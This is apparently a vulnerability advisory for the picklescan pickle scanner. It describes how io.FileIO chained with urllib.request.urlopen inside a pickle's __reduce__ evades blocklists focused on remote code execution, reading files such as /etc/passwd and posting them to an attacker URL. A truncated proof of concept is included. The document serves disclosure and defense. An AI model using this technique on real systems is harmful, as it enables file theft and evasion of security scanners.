Server-side request forgery (SSRF) In picklescan
Description
picklescan has Arbitrary file read using io.FileIO
Summary
Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.
Details
The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:
io.FileIO: Opens local files without using builtins.open.
urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.
Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.
PoC
import pickle, io, urllib.request class GetFile: def __reduce__(self): return (io.FileIO, ('/etc/hosts', 'r')) class Exfiltrate: def __reduce__(self):...
Impact
Arbitrary file read
Thanks for this library and your time. If you think picklescan is focused on detecting only RCE kind of vulnerabilities rather adding File IO, Http or any protocol based may cause lot of noise, feel free to close this issue.
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
 pypi | 0.0.35 |
Aliases
References